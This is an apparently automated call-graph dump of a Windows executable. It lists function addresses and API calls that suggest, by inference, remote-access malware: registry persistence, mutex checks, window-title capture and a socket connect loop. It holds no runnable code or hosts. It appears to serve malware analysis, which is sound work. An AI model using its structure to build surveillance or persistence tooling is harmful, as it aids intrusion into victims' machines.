47523 2d76383 28 API calls 47521->47523 47524 2d71fd8 11 API calls 47522->47524 47525 2d8b5e4 47523->47525 47526 2d7f048 47524->47526 47944 2d72f10 47525->47944 47526->47179 47529 2d76383 28 API calls 47530 2d8b5fc 47529->47530 47949 2d7723b 76 API calls 47530->47949 47532 2d8b60a 47533 2d71fd8 11 API calls 47532->47533 47534 2d8b616 47533->47534 47535 2d71fd8 11 API calls 47534->47535 47536 2d8b61f 47535->47536 47537 2d71fd8 11 API calls 47536->47537 47538 2d8b628 47537->47538 47539 2d71fd8 11 API calls 47538->47539 47539->47517 47541 2d79e3d _wcslen 47540->47541 47542 2d79e5f 47541->47542 47543 2d79e48 47541->47543 47544 2d7da6f 31 API calls 47542->47544 47545 2d7da6f 31 API calls 47543->47545 47547 2d79e67 47544->47547 47546 2d79e50 47545->47546 47548 2d71f13 28 API calls 47546->47548 47549 2d71f13 28 API calls 47547->47549 47564 2d79e5a 47548->47564 47550 2d79e75 47549->47550 47551 2d71f09 11 API calls 47550->47551 47553 2d79e7d 47551->47553 47552 2d71f09 11 API calls 47554 2d79eb4 47552->47554 47979 2d79196 28 API calls 47553->47979 47964 2d7a144 47554->47964 47557 2d79e8f 47980 2d73014 47557->47980 47561 2d71f13 28 API calls 47562 2d79ea4 47561->47562 47563 2d71f09 11 API calls 47562->47563 47563->47564 47564->47552 47566 2d8b6c1 GetUserNameW 47565->47566 47567 2d7417e 28 API calls 47566->47567 47568 2d8b6ed 47567->47568 48020 2d742fc 47568->48020 47571 2d73014 28 API calls 47572 2d8b703 47571->47572 47573 2d71f09 11 API calls 47572->47573 47574 2d8b70c 47573->47574 47575 2d71f09 11 API calls 47574->47575 47576 2d7f25e 47575->47576 47576->47232 47578 2d83a7a RegDeleteValueW 47577->47578 47579 2d7f3cd 47577->47579 47578->47579 47579->47099 47581 2d7dd96 47580->47581 47582 2d8353a 3 API calls 47581->47582 47583 2d7dd9d 47582->47583 47584 2d7ddbc 47583->47584 48097 2d71707 47583->48097 47588 2d84f65 47584->47588 47586 2d7ddaa 48100 2d838b2 RegCreateKeyA 47586->48100 47589 2d720df 11 API calls 47588->47589 47590 2d84f79 47589->47590 48114 2d8b944 47590->48114 47593 2d720df 11 API calls 47594 2d84f8f 47593->47594 47595 2d71e65 22 API calls 47594->47595 47596 2d84f9d 47595->47596 47597 2dabb2c 39 API calls 47596->47597 47598 2d84faa 47597->47598 47599 2d84fbc 47598->47599 47600 2d84faf Sleep 47598->47600 47601 2d72093 28 API calls 47599->47601 47600->47599 47602 2d84fcb 47601->47602 47603 2d71e65 22 API calls 47602->47603 47604 2d84fd4 47603->47604 47605 2d720f6 28 API calls 47604->47605 47606 2d84fdf 47605->47606 47607 2d8beac 28 API calls 47606->47607 47608 2d84fe7 47607->47608 48118 2d7489e WSAStartup 47608->48118 47610 2d84ff1 47611 2d71e65 22 API calls 47610->47611 47612 2d84ffa 47611->47612 47613 2d71e65 22 API calls 47612->47613 47628 2d85079 47612->47628 47614 2d85013 47613->47614 47616 2d71e65 22 API calls 47614->47616 47615 2d71e65 22 API calls 47615->47628 47618 2d85024 47616->47618 47617 2d720f6 28 API calls 47617->47628 47620 2d71e65 22 API calls 47618->47620 47619 2d8beac 28 API calls 47619->47628 47621 2d85035 47620->47621 47623 2d71e65 22 API calls 47621->47623 47622 2d76c59 28 API calls 47622->47628 47624 2d85046 47623->47624 47625 2d71e65 22 API calls 47624->47625 47627 2d85057 47625->47627 47626 2d71fe2 28 API calls 47626->47628 47629 2d71e65 22 API calls 47627->47629 47628->47615 47628->47617 47628->47619 47628->47622 47628->47626 47632 2d76383 28 API calls 47628->47632 47633 2d71fd8 11 API calls 47628->47633 47635 2d851c7 WSAGetLastError 47628->47635 47644 2d7531e 28 API calls 47628->47644 47649 2d72f10 28 API calls 47628->47649 47650 2d72093 28 API calls 47628->47650 47651 2d8b580 79 API calls 47628->47651 47654 2d79097 28 API calls 47628->47654 47656 2d83733 3 API calls 47628->47656 47657 2d835e1 31 API calls 47628->47657 47658 2d7417e 28 API calls 47628->47658 47663 2d71e65 22 API calls 47628->47663 47683 2d851d7 47628->47683 48119 2d84f24 47628->48119 48125 2d7482d 47628->48125 48132 2d74f51 47628->48132 48147 2d748c8 connect 47628->48147 48207 2d8b871 47628->48207 48210 2d845f8 47628->48210 48213 2db1ed1 47628->48213 48217 2d7ddc4 47628->48217 48223 2d8bcd3 47628->48223 48226 2d8bdaf 47628->48226 48230 2d8bc1f 47628->48230 47630 2d85069 47629->47630 48263 2d7473d 88 API calls 47630->48263 47632->47628 47633->47628 48264 2d8cb72 30 API calls 47635->48264 47639 2d72093 28 API calls 47639->47683 47642 2d8b580 79 API calls 47642->47683 47644->47628 47645 2d71e65 22 API calls 47645->47683 47646 2d71e8d 11 API calls 47646->47683 47647 2dabb2c 39 API calls 47648 2d85b0a Sleep 47647->47648 47648->47683 47649->47628 47650->47628 47651->47628 47654->47628 47656->47628 47657->47628 47658->47628 47664 2d85474 GetTickCount 47663->47664 47665 2d8bc1f 28 API calls 47664->47665 47678 2d85491 47665->47678 47667 2d8bc1f 28 API calls 47667->47678 47670 2d8bdaf 28 API calls 47670->47678 47672 2d76383 28 API calls 47672->47678 47673 2d72ea1 28 API calls 47673->47678 47674 2d72f10 28 API calls 47674->47678 47676 2d71fd8 11 API calls 47676->47678 47677 2d71f09 11 API calls 47677->47678 47678->47667 47678->47670 47678->47672 47678->47673 47678->47674 47678->47676 47678->47677 48235 2d8bb77 47678->48235 48237 2d8bb27 47678->48237 48242 2d7f90c 29 API calls 47678->48242 48243 2d72f31 28 API calls 47678->48243 48244 2d74c10 47678->48244 48266 2d74aa1 60 API calls _Yarn 47678->48266 47681 2d85aac CreateThread 47681->47683 48427 2d8ada8 104 API calls 47681->48427 47682 2d71fd8 11 API calls 47682->47683 47683->47628 47683->47639 47683->47642 47683->47645 47683->47646 47683->47647 47683->47681 47683->47682 47684 2d71f09 11 API calls 47683->47684 48265 2d752fd 28 API calls 47683->48265 48267 2d7b08c 84 API calls 47683->48267 48268 2d74e26 98 API calls 47683->48268 47684->47683 47685->47017 47686->47024 47687->47029 47690 2d720df 11 API calls 47689->47690 47691 2d76c65 47690->47691 47692 2d732a0 28 API calls 47691->47692 47693 2d76c82 47692->47693 47693->47050 47694->47073 47695->47081 47696->47075 47697->47067 47698->47083 47699->47153 47701 2d839a0 47700->47701 47702 2d76e13 28 API calls 47701->47702 47703 2d839b5 47702->47703 47704 2d720f6 28 API calls 47703->47704 47705 2d839c5 47704->47705 47706 2d837aa 14 API calls 47705->47706 47707 2d839cf 47706->47707 47708 2d71fd8 11 API calls 47707->47708 47709 2d839dc 47708->47709 47709->47152 47710->47175 47712 2d83759 RegQueryValueExA RegCloseKey 47711->47712 47713 2d8377d 47711->47713 47712->47713 47713->47134 47714->47167 47715->47204 47716->47213 47717->47237 47718->47224 47721 2d8355b RegQueryValueExA RegCloseKey 47720->47721 47722 2d7f31f 47720->47722 47721->47722 47722->47104 47722->47260 47723->47269 47726 2d7f419 47725->47726 47727 2d8b556 LoadResource LockResource SizeofResource 47725->47727 47728 2dabda0 47726->47728 47727->47726 47729 2db61b8 47728->47729 47730 2db61f6 47729->47730 47731 2db61e1 HeapAlloc 47729->47731 47736 2db61ca ___crtLCMapStringA 47729->47736 47747 2db062d 20 API calls __dosmaperr 47730->47747 47733 2db61f4 47731->47733 47731->47736 47734 2db61fb 47733->47734 47734->47304 47736->47730 47736->47731 47746 2db3001 7 API calls 2 library calls 47736->47746 47738 2d720bf 47737->47738 47748 2d723ce 47738->47748 47740 2d720ca 47752 2d7250a 47740->47752 47742 2d720d9 47742->47307 47744 2d720b7 28 API calls 47743->47744 47745 2d76e27 47744->47745 47745->47314 47746->47736 47747->47734 47749 2d723d8 47748->47749 47750 2d72428 47748->47750 47749->47750 47759 2d727a7 11 API calls std::_Deallocate 47749->47759 47750->47740 47753 2d7251a 47752->47753 47754 2d72535 47753->47754 47755 2d72520 47753->47755 47770 2d728e8 28 API calls 47754->47770 47760 2d72569 47755->47760 47758 2d72533 47758->47742 47759->47750 47771 2d72888 47760->47771 47762 2d7257d 47763 2d725a7 47762->47763 47764 2d72592 47762->47764 47778 2d728e8 28 API calls 47763->47778 47776 2d72a34 22 API calls 47764->47776 47767 2d7259b 47777 2d729da 22 API calls 47767->47777 47769 2d725a5 47769->47758 47770->47758 47772 2d72890 47771->47772 47773 2d72898 47772->47773 47779 2d72ca3 22 API calls 47772->47779 47773->47762 47776->47767 47777->47769 47778->47769 47781 2d720e7 47780->47781 47782 2d723ce 11 API calls 47781->47782 47783 2d720f2 47782->47783 47783->47342 47789 2d7423a 47784->47789 47787->47342 47788->47323 47790 2d74243 47789->47790 47791 2d723ce 11 API calls 47790->47791 47792 2d7424e 47791->47792 47793 2d72569 28 API calls 47792->47793 47794 2d741b5 47793->47794 47794->47342 47795->47346 47796->47350 47797->47352 47801 2d732aa 47799->47801 47800 2d732c9 47800->47362 47801->47800 47803 2d728e8 28 API calls 47801->47803 47803->47800 47805 2d751fb 47804->47805 47814 2d75274 47805->47814 47807 2d75208 47807->47365 47809 2d72061 47808->47809 47810 2d723ce 11 API calls 47809->47810 47811 2d7207b 47810->47811 47819 2d7267a 47811->47819 47815 2d75282 47814->47815 47818 2d728a4 22 API calls 47815->47818 47820 2d7268b 47819->47820 47821 2d723ce 11 API calls 47820->47821 47822 2d7208d 47821->47822 47822->47368 47823->47370 47824->47381 47826 2d72246 47825->47826 47826->47408 47828 2d8b362 47827->47828 47829 2d8c055 GetCurrentProcess 47827->47829 47830 2d835e1 RegOpenKeyExA 47828->47830 47829->47828 47831 2d8360f RegQueryValueExA RegCloseKey 47830->47831 47832 2d83639 47830->47832 47831->47832 47833 2d72093 28 API calls 47832->47833 47834 2d8364e 47833->47834 47834->47414 47835->47423 47837 2d7b947 47836->47837 47842 2d72252 47837->47842 47839 2d7b952 47846 2d7b967 47839->47846 47841 2d7b961 47841->47429 47843 2d722ac 47842->47843 47844 2d7225c 47842->47844 47843->47839 47844->47843 47853 2d72779 11 API calls std::_Deallocate 47844->47853 47847 2d7b973 47846->47847 47848 2d7b9a1 47846->47848 47854 2d727e6 47847->47854 47865 2d728a4 22 API calls 47848->47865 47851 2d7b97d 47851->47841 47853->47843 47855 2d727ef 47854->47855 47856 2d72851 47855->47856 47857 2d727f9 47855->47857 47867 2d728a4 22 API calls 47856->47867 47860 2d72802 47857->47860 47862 2d72815 47857->47862 47866 2d72aea 28 API calls __EH_prolog 47860->47866 47863 2d72813 47862->47863 47864 2d72252 11 API calls 47862->47864 47863->47851 47864->47863 47866->47863 47868->47432 47870 2d72347 47869->47870 47871 2d72252 11 API calls 47870->47871 47872 2d723c7 47871->47872 47872->47432 47874 2d71f8e 47873->47874 47875 2d72252 11 API calls 47874->47875 47876 2d71f99 47875->47876 47876->47445 47876->47446 47876->47448 47878 2d74186 47877->47878 47879 2d72252 11 API calls 47878->47879 47880 2d74191 47879->47880 47889 2d741bc 47880->47889 47883->47453 47884->47477 47885->47476 47886->47464 47887->47470 47888->47478 47890 2d741c8 47889->47890 47893 2d741d9 47890->47893 47892 2d7419c 47892->47458 47894 2d741e9 47893->47894 47895 2d74206 47894->47895 47896 2d741ef 47894->47896 47897 2d727e6 28 API calls 47895->47897 47900 2d74267 47896->47900 47899 2d74204 47897->47899 47899->47892 47901 2d72888 22 API calls 47900->47901 47902 2d7427b 47901->47902 47903 2d742a5 47902->47903 47904 2d74290 47902->47904 47905 2d727e6 28 API calls 47903->47905 47910 2d742df 22 API calls 47904->47910 47909 2d742a3 47905->47909 47907 2d74299 47911 2d72c48 22 API calls 47907->47911 47909->47899 47910->47907 47911->47909 47913 2d724f9 47912->47913 47914 2d7250a 28 API calls 47913->47914 47915 2d720b1 47914->47915 47915->47147 47932 2daba8a 47916->47932 47918 2daaed0 47938 2daa837 35 API calls 2 library calls 47918->47938 47919 2daaeaa 47937 2db062d 20 API calls __dosmaperr 47919->47937 47920 2daae95 47920->47918 47920->47919 47931 2daaeaf ___std_exception_copy 47920->47931 47924 2daaedc 47925 2daaf0b 47924->47925 47939 2dabacf 39 API calls __Toupper 47924->47939 47928 2daaf77 47925->47928 47940 2daba36 20 API calls 2 library calls 47925->47940 47941 2daba36 20 API calls 2 library calls 47928->47941 47929 2dab03e _swprintf 47929->47931 47942 2db062d 20 API calls __dosmaperr 47929->47942 47931->47515 47933 2daba8f 47932->47933 47934 2dabaa2 47932->47934 47943 2db062d 20 API calls __dosmaperr 47933->47943 47934->47920 47936 2daba94 ___std_exception_copy 47936->47920 47937->47931 47938->47924 47939->47924 47940->47928 47941->47929 47942->47931 47943->47936 47950 2d71fb0 47944->47950 47946 2d72f1e 47947 2d72055 11 API calls 47946->47947 47948 2d72f2d 47947->47948 47948->47529 47949->47532 47953 2d725f0 47950->47953 47952 2d71fbd 47952->47946 47954 2d72888 22 API calls 47953->47954 47955 2d72602 47954->47955 47956 2d72672 47955->47956 47957 2d72629 47955->47957 47963 2d728a4 22 API calls 47956->47963 47961 2d7263b 47957->47961 47962 2d728e8 28 API calls 47957->47962 47961->47952 47962->47961 47965 2d7a162 47964->47965 47966 2d83584 3 API calls 47965->47966 47967 2d7a169 47966->47967 47968 2d7a197 47967->47968 47969 2d7a17d 47967->47969 47970 2d79097 28 API calls 47968->47970 47971 2d7a182 47969->47971 47972 2d79ed6 47969->47972 47973 2d7a1a5 47970->47973 47985 2d79097 47971->47985 47972->47198 47992 2d7a1b4 85 API calls 47973->47992 47978 2d7a195 47978->47972 47979->47557 47997 2d73222 47980->47997 47982 2d73022 48001 2d73262 47982->48001 47986 2d790ad 47985->47986 47987 2d72252 11 API calls 47986->47987 47988 2d790c7 47987->47988 47989 2d74267 28 API calls 47988->47989 47990 2d790d5 47989->47990 47991 2d7a268 29 API calls 47990->47991 47991->47978 47993 2d7a2ae 162 API calls 47991->47993 47992->47972 47994 2d7a2c4 48 API calls 47992->47994 47995 2d7a2a2 85 API calls 47992->47995 47996 2d7a2b8 127 API calls 47992->47996 47998 2d7322e 47997->47998 48007 2d73618 47998->48007 48000 2d7323b 48000->47982 48002 2d7326e 48001->48002 48003 2d72252 11 API calls 48002->48003 48004 2d73288 48003->48004 48005 2d72336 11 API calls 48004->48005 48006 2d73031 48005->48006 48006->47561 48008 2d73626 48007->48008 48009 2d73644 48008->48009 48010 2d7362c 48008->48010 48012 2d7369e 48009->48012 48013 2d7365c 48009->48013 48018 2d736a6 28 API calls 48010->48018 48019 2d728a4 22 API calls 48012->48019 48016 2d727e6 28 API calls 48013->48016 48017 2d73642 48013->48017 48016->48017 48017->48000 48018->48017 48025 2d74353 48020->48025 48022 2d7430a 48023 2d73262 11 API calls 48022->48023 48024 2d74319 48023->48024 48024->47571 48026 2d7435f 48025->48026 48029 2d74371 48026->48029 48028 2d7436d 48028->48022 48030 2d7437f 48029->48030 48031 2d74385 48030->48031 48032 2d7439e 48030->48032 48095 2d734e6 28 API calls 48031->48095 48033 2d72888 22 API calls 48032->48033 48034 2d743a6 48033->48034 48036 2d743bf 48034->48036 48037 2d74419 48034->48037 48039 2d727e6 28 API calls 48036->48039 48049 2d7439c 48036->48049 48096 2d728a4 22 API calls 48037->48096 48039->48049 48049->48028 48095->48049 48103 2daab1a 48097->48103 48101 2d838ca RegSetValueExA RegCloseKey 48100->48101 48102 2d838f4 48100->48102 48101->48102 48102->47584 48106 2daaa9b 48103->48106 48105 2d7170d 48105->47586 48107 2daaaaa 48106->48107 48108 2daaabe 48106->48108 48112 2db062d 20 API calls __dosmaperr 48107->48112 48111 2daaaaf __alldvrm ___std_exception_copy 48108->48111 48113 2db89d7 11 API calls 2 library calls 48108->48113 48111->48105 48112->48111 48113->48111 48117 2d8b98a _Yarn ___scrt_get_show_window_mode 48114->48117 48115 2d72093 28 API calls 48116 2d84f84 48115->48116 48116->47593 48117->48115 48118->47610 48120 2d84f3d WSASetLastError 48119->48120 48121 2d84f33 48119->48121 48120->47628 48269 2d84dc1 29 API calls ___std_exception_copy 48121->48269 48123 2d84f38 48123->48120 48126 2d74846 socket 48125->48126 48127 2d74839 48125->48127 48129 2d74842 48126->48129 48130 2d74860 CreateEventW 48126->48130 48270 2d7489e WSAStartup 48127->48270 48129->47628 48130->47628 48131 2d7483e 48131->48126 48131->48129 48133 2d74f65 48132->48133 48134 2d74fea 48132->48134 48135 2d74f6e 48133->48135 48136 2d74fc0 CreateEventA CreateThread 48133->48136 48137 2d74f7d GetLocalTime 48133->48137 48134->47628 48135->48136 48136->48134 48272 2d75150 48136->48272 48138 2d8bc1f 28 API calls 48137->48138 48139 2d74f91 48138->48139 48271 2d752fd 28 API calls 48139->48271 48148 2d748ee 48147->48148 48149 2d74a1b 48147->48149 48151 2d74923 48148->48151 48154 2d7531e 28 API calls 48148->48154 48200 2d7497e 48148->48200 48150 2d74a21 WSAGetLastError 48149->48150 48149->48200 48152 2d74a31 48150->48152 48150->48200 48276 2d90cf1 27 API calls 48151->48276 48155 2d74a36 48152->48155 48156 2d74932 48152->48156 48159 2d7490f 48154->48159 48281 2d8cb72 30 API calls 48155->48281 48162 2d72093 28 API calls 48156->48162 48158 2d7492b 48158->48156 48161 2d74941 48158->48161 48163 2d72093 28 API calls 48159->48163 48160 2d74a40 48282 2d752fd 28 API calls 48160->48282 48171 2d74987 48161->48171 48172 2d74950 48161->48172 48166 2d74a80 48162->48166 48164 2d7491e 48163->48164 48167 2d8b580 79 API calls 48164->48167 48169 2d72093 28 API calls 48166->48169 48167->48151 48173 2d74a8f 48169->48173 48278 2d91ad1 53 API calls 48171->48278 48177 2d72093 28 API calls 48172->48177 48174 2d8b580 79 API calls 48173->48174 48174->48200 48180 2d7495f 48177->48180 48179 2d7498f 48182 2d749c4 48179->48182 48183 2d74994 48179->48183 48184 2d72093 28 API calls 48180->48184 48280 2d90e97 28 API calls 48182->48280 48187 2d72093 28 API calls 48183->48187 48188 2d7496e 48184->48188 48190 2d749a3 48187->48190 48191 2d8b580 79 API calls 48188->48191 48189 2d749cc 48192 2d749f9 CreateEventW CreateEventW 48189->48192 48195 2d72093 28 API calls 48189->48195 48193 2d72093 28 API calls 48190->48193 48194 2d74973 48191->48194 48192->48200 48196 2d749b2 48193->48196 48277 2d8e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48194->48277 48198 2d749e2 48195->48198 48199 2d8b580 79 API calls 48196->48199 48201 2d72093 28 API calls 48198->48201 48202 2d749b7 48199->48202 48200->47628 48203 2d749f1 48201->48203 48279 2d91143 51 API calls 48202->48279 48205 2d8b580 79 API calls 48203->48205 48206 2d749f6 48205->48206 48206->48192 48283 2d8b847 GlobalMemoryStatusEx 48207->48283 48209 2d8b886 48209->47628 48284 2d845bb 48210->48284 48214 2db1edd 48213->48214 48322 2db1ccd 48214->48322 48216 2db1efe 48216->47628 48218 2d7dde0 48217->48218 48219 2d8353a 3 API calls 48218->48219 48220 2d7dde7 48219->48220 48221 2d83584 3 API calls 48220->48221 48222 2d7ddff 48220->48222 48221->48222 48222->47628 48224 2d720b7 28 API calls 48223->48224 48225 2d8bce8 48224->48225 48225->47628 48227 2d8bdbc 48226->48227 48228 2d720b7 28 API calls 48227->48228 48229 2d8bdce 48228->48229 48229->47628 48231 2db1ed1 20 API calls 48230->48231 48232 2d8bc43 48231->48232 48233 2d72093 28 API calls 48232->48233 48234 2d8bc51 48233->48234 48234->47628 48236 2d8bb8d GetTickCount 48235->48236 48236->47678 48238 2da6f10 ___scrt_get_show_window_mode 48237->48238 48239 2d8bb46 GetForegroundWindow GetWindowTextW 48238->48239 48240 2d7417e 28 API calls 48239->48240 48241 2d8bb70 48240->48241 48241->47678 48242->47678 48243->47678 48245 2d720df 11 API calls 48244->48245 48246 2d74c27 48245->48246 48247 2d720df 11 API calls 48246->48247 48261 2d74c30 48247->48261 48248 2dabda0 ___std_exception_copy 21 API calls 48248->48261 48250 2d74c96 48253 2d74ca1 48250->48253 48250->48261 48251 2d720b7 28 API calls 48251->48261 48252 2d71fe2 28 API calls 48252->48261 48340 2d74e26 98 API calls 48253->48340 48255 2d74ca8 48257 2d71fd8 11 API calls 48255->48257 48256 2d71fd8 11 API calls 48256->48261 48258 2d74cb1 48257->48258 48259 2d71fd8 11 API calls 48258->48259 48260 2d74cba 48259->48260 48260->47683 48261->48248 48261->48250 48261->48251 48261->48252 48261->48256 48327 2d74cc3 48261->48327 48339 2d74b96 56 API calls 48261->48339 48263->47628 48264->47683 48266->47678 48267->47683 48268->47683 48269->48123 48270->48131 48275 2d7515c 101 API calls 48272->48275 48274 2d75159 48275->48274 48276->48158 48277->48200 48278->48179 48279->48194 48280->48189 48281->48160 48283->48209 48287 2d8458e 48284->48287 48288 2d845a3 ___scrt_initialize_default_local_stdio_options 48287->48288 48291 2daf7ed 48288->48291 48294 2dac540 48291->48294 48295 2dac568 48294->48295 48296 2dac580 48294->48296 48316 2db062d 20 API calls __dosmaperr 48295->48316 48296->48295 48298 2dac588 48296->48298 48317 2daa837 35 API calls 2 library calls 48298->48317 48299 2dac56d ___std_exception_copy 48309 2da502b 48299->48309 48301 2dac598 48318 2daccc6 20 API calls 2 library calls 48301->48318 48304 2d845b1 48304->47628 48305 2dac610 48319 2dad334 50 API calls 3 library calls 48305->48319 48308 2dac61b 48320 2dacd30 20 API calls _free 48308->48320 48310 2da5036 IsProcessorFeaturePresent 48309->48310 48311 2da5034 48309->48311 48313 2da5078 48310->48313 48311->48304 48321 2da503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 48313->48321 48315 2da515b 48315->48304 48316->48299 48317->48301 48318->48305 48319->48308 48320->48299 48321->48315 48323 2db1ce4 48322->48323 48325 2db1d1b ___std_exception_copy 48323->48325 48326 2db062d 20 API calls __dosmaperr 48323->48326 48325->48216 48326->48325 48328 2d720df 11 API calls 48327->48328 48329 2d74cde 48328->48329 48330 2d74e13 48329->48330 48333 2d71fd8 11 API calls 48329->48333 48334 2d71fc0 28 API calls 48329->48334 48335 2d720f6 28 API calls 48329->48335 48337 2d741a2 28 API calls 48329->48337 48338 2d71fe2 28 API calls 48329->48338 48331 2d71fd8 11 API calls 48330->48331 48332 2d74e1c 48331->48332 48332->48250 48333->48329 48336 2d74dad CreateEventA CreateThread WaitForSingleObject CloseHandle 48334->48336 48335->48329 48336->48329 48341 2d85b25 48336->48341 48337->48329 48338->48329 48339->48261 48340->48255 48342 2d720f6 28 API calls 48341->48342 48343 2d85b47 SetEvent 48342->48343 48344 2d85b5c 48343->48344 48345 2d741a2 28 API calls 48344->48345 48346 2d85b76 48345->48346 48347 2d720f6 28 API calls 48346->48347 48348 2d85b86 48347->48348 48349 2d720f6 28 API calls 48348->48349 48350 2d85b98 48349->48350 48351 2d8beac 28 API calls 48350->48351 48352 2d85ba1 48351->48352 48353 2d870c4 48352->48353 48355 2d85d6a 48352->48355 48356 2d85bc1 GetTickCount 48352->48356 48354 2d71e8d 11 API calls 48353->48354 48357 2d870cd 48354->48357 48355->48353 48415 2d85d20 48355->48415 48358 2d8bc1f 28 API calls 48356->48358 48359 2d71fd8 11 API calls 48357->48359 48360 2d85bd2 48358->48360 48362 2d870d9 48359->48362 48363 2d8bb77 GetTickCount 48360->48363 48365 2d71fd8 11 API calls 48362->48365 48366 2d85bde 48363->48366 48364 2d85d04 48364->48353 48367 2d870e5 48365->48367 48368 2d8bc1f 28 API calls 48366->48368 48369 2d85be9 48368->48369 48370 2d8bb27 30 API calls 48369->48370 48371 2d85bf7 48370->48371 48372 2d8bdaf 28 API calls 48371->48372 48373 2d85c05 48372->48373 48374 2d71e65 22 API calls 48373->48374 48375 2d85c13 48374->48375 48420 2d72f31 28 API calls 48375->48420 48377 2d85c21 48421 2d72ea1 28 API calls 48377->48421 48379 2d85c30 48380 2d72f10 28 API calls 48379->48380 48381 2d85c3f 48380->48381 48422 2d72ea1 28 API calls 48381->48422 48383 2d85c4e 48384 2d72f10 28 API calls 48383->48384 48385 2d85c5a 48384->48385 48423 2d72ea1 28 API calls 48385->48423 48387 2d85c64 48424 2d74aa1 60 API calls _Yarn 48387->48424 48389 2d85c73 48390 2d71fd8 11 API calls 48389->48390 48391 2d85c7c 48390->48391 48392 2d71fd8 11 API calls 48391->48392 48393 2d85c88 48392->48393 48394 2d71fd8 11 API calls 48393->48394 48395 2d85c94 48394->48395 48396 2d71fd8 11 API calls 48395->48396 48397 2d85ca0 48396->48397 48398 2d71fd8 11 API calls 48397->48398 48399 2d85cac 48398->48399 48400 2d71fd8 11 API calls 48399->48400 48401 2d85cb8 48400->48401 48402 2d71f09 11 API calls 48401->48402 48403 2d85cc1 48402->48403 48404 2d71fd8 11 API calls 48403->48404 48405 2d85cca 48404->48405 48406 2d71fd8 11 API calls 48405->48406 48407 2d85cd3 48406->48407 48408 2d71e65 22 API calls 48407->48408 48409 2d85cde 48408->48409 48410 2dabb2c 39 API calls 48409->48410 48411 2d85ceb 48410->48411 48412 2d85cf0 48411->48412 48413 2d85d16 48411->48413 48416 2d85d09 48412->48416 48417 2d85cfe 48412->48417 48414 2d71e65 22 API calls 48413->48414 48414->48415 48415->48353 48426 2d750e4 83 API calls 48415->48426 48419 2d74f51 104 API calls 48416->48419 48425 2d74ff4 81 API calls 48417->48425 48419->48364 48420->48377 48421->48379 48422->48383 48423->48387 48424->48389 48425->48364 48426->48364 48429 2d82159 48428->48429 48430 2d838b2 3 API calls 48429->48430 48431 2d82160 48430->48431 48432 2d82166 48431->48432 48433 2d82178 OpenMutexA 48431->48433 48434 2d8218f CloseHandle 48433->48434 48435 2d82214 48433->48435 48436 2d72093 28 API calls 48434->48436 48437 2d720df 11 API calls 48435->48437 48439 2d821a5 48436->48439 48438 2d8221d 48437->48438 48571 2d8c516 CreateFileW 48438->48571 48440 2d72093 28 API calls 48439->48440 48441 2d821b5 48440->48441 48442 2d8b580 79 API calls 48441->48442 48444 2d821ba 48442->48444 48446 2d72093 28 API calls 48444->48446 48448 2d821c9 48446->48448 48447 2d71f86 11 API calls 48449 2d8223b 48447->48449 48450 2d72093 28 API calls 48448->48450 48451 2d8c048 GetCurrentProcess 48449->48451 48452 2d821d4 48450->48452 48453 2d82240 48451->48453 48454 2d8b580 79 API calls 48452->48454 48455 2d8229c 48453->48455 48456 2d82244 48453->48456 48457 2d821d9 CreateThread 48454->48457 48458 2d7417e 28 API calls 48455->48458 48459 2d7417e 28 API calls 48456->48459 48460 2d821fe 48457->48460 48624 2d82829 61 API calls 48457->48624 48461 2d822aa 48458->48461 48462 2d82255 48459->48462 48463 2d83584 3 API calls 48460->48463 48465 2d7417e 28 API calls 48461->48465 48466 2d7417e 28 API calls 48462->48466 48464 2d82205 48463->48464 48464->48432 48470 2d8244b OpenProcess 48464->48470 48467 2d822c0 48465->48467 48468 2d8226b 48466->48468 48612 2d72fa5 28 API calls 48467->48612 48611 2d72fa5 28 API calls 48468->48611 48474 2d82468 48470->48474 48472 2d822ce 48475 2d71f13 28 API calls 48472->48475 48473 2d82276 48476 2d71f13 28 API calls 48473->48476 48479 2d839e4 30 API calls 48474->48479 48477 2d822d9 48475->48477 48478 2d82281 48476->48478 48480 2d71f09 11 API calls 48477->48480 48481 2d71f09 11 API calls 48478->48481 48482 2d8246f 48479->48482 48483 2d822e5 48480->48483 48484 2d8228a 48481->48484 48614 2d8247a 144 API calls 48482->48614 48485 2d71f09 11 API calls 48483->48485 48486 2d71f09 11 API calls 48484->48486 48488 2d82293 48485->48488 48486->48488 48490 2d71f09 11 API calls 48488->48490 48491 2d822f7 48490->48491 48492 2d7417e 28 API calls 48491->48492 48493 2d8230e 48492->48493 48579 2d828b8 48493->48579 48496 2d71f09 11 API calls 48497 2d82325 48496->48497 48498 2d7417e 28 API calls 48497->48498 48499 2d82333 48498->48499 48500 2d828b8 28 API calls 48499->48500 48501 2d82341 48500->48501 48502 2d71f09 11 API calls 48501->48502 48503 2d8234a 48502->48503 48504 2d7417e 28 API calls 48503->48504 48505 2d82358 48504->48505 48506 2d828b8 28 API calls 48505->48506 48507 2d82366 48506->48507 48508 2d71f09 11 API calls 48507->48508 48520 2d8236f 48508->48520 48509 2d823b9 48510 2d72093 28 API calls 48509->48510 48511 2d823c8 48510->48511 48513 2d72093 28 API calls 48511->48513 48512 2d71e65 22 API calls 48512->48520 48514 2d823d7 48513->48514 48515 2d8b580 79 API calls 48514->48515 48516 2d823dc CloseHandle 48515->48516 48613 2d76b17 11 API calls 48516->48613 48519 2d823f4 48521 2d71f09 11 API calls 48519->48521 48520->48509 48520->48512 48522 2d82412 48520->48522 48590 2d8812a 48520->48590 48523 2d823fd 48521->48523 48524 2d72093 28 API calls 48522->48524 48525 2d71fd8 11 API calls 48523->48525 48526 2d82421 48524->48526 48527 2d82406 48525->48527 48528 2d72093 28 API calls 48526->48528 48527->48432 48529 2d82430 48528->48529 48530 2d8b580 79 API calls 48529->48530 48531 2d82435 Sleep 48530->48531 48531->48482 48551 2d7f7fd 48532->48551 48533 2d83584 3 API calls 48533->48551 48534 2d7f8a1 48536 2d79097 28 API calls 48534->48536 48535 2d79097 28 API calls 48535->48551 48540 2d7f8ac 48536->48540 48537 2d7f891 Sleep 48537->48551 48538 2d7f82f 48625 2d7d0d1 111 API calls ___scrt_get_show_window_mode 48538->48625 48539 2d8bcef 28 API calls 48539->48551 48542 2d8bcef 28 API calls 48540->48542 48543 2d7f8b8 48542->48543 48545 2d8384f 14 API calls 48543->48545 48547 2d7f8cb 48545->48547 48546 2d71f09 11 API calls 48546->48551 48548 2d71f09 11 API calls 48547->48548 48550 2d7f8d7 48548->48550 48549 2d72093 28 API calls 48549->48551 48552 2d72093 28 API calls 48550->48552 48551->48533 48551->48534 48551->48535 48551->48537 48551->48538 